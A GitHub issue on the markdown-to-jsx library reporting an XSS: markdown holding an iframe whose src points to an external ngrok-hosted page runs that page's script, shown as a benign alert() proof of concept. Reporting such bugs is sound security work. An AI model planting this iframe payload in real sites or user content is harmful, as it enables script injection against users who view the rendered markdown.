markdown-to-jsx icon indicating copy to clipboard operation
markdown-to-jsx copied to clipboard
verified publisher icon quantizor

XSS via <iframe> src attribute

Open Ryan-Awad opened this issue 7 months ago • 0 comments

Hello,

I was able to execute some JS by loading an external HTML document via the src attribute in an iframe tag.

<iframe src="https://my-malicious-web-page.ngrok-free.app/"></iframe>

Where the web page I loaded contains the following HTML:

<!DOCTYPE html>
<html>
  <head></head>
    <body>
      <h1>Hello World</h1>
      <script>alert("Hello world");</script>
    </body>
</html>

Image

Try it out in the playground: https://markdown-to-jsx.quantizor.dev/

I'm not sure which sanitizer is being used in the playground but I don't think JS should ever be executed in MD, regardless of the sanitizer.

Thank you!

Ryan-Awad avatar May 21 '25 19:05 Ryan-Awad